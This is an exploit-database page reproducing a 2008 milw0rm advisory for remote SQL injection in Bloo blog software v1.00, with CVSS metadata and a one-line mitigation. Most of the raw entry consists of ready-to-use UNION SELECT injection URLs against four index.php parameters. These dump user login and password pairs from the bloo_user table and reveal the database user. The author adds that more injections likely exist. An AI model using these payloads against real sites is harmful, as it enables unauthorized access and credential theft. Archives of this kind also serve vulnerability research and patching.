header-logo
Suggest Exploit
vendor:
Bloo
by:
MhZ91
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Bloo
Affected Version From: v.1.00
Affected Version To: v.1.00
Patch Exists: NO
Related CWE: N/A
CPE: a:bloo_project:bloo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Bloo – Object Oriented Blog Software <= v.1.00 Remote Sql Injection

Bloo - Object Oriented Blog Software <= v.1.00 is vulnerable to remote SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+	     Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection     +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection 
 Download: http://sourceforge.net/project/showfiles.php?group_id=160870
 Bug: Remote Sql Injection
 Info: Bloo is a free, public-domain, object-oriented implementation of full-featured blog software, based on the Phoo Phramework. You can visit the Bloo home wiki at http://outofthebloo.com.
 Visit: http://www.inj3ct-it.org

[*]----------------------------------------------------------

Bloo - Object Oriented Blog Software <= v.1.00 present more sql injection...

http://www.example.com/index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user/*

http://www.example.com/index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*

http://www.example.com/index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*

http://www.example.com/index.php?static_page_id=1+union+select+1,user(),3,4,5,6/*

etc...

etc... 

etc...

I think there are other sql injection in this blog lol

[*]----------------------------------------------------------

# milw0rm.com [2008-03-11]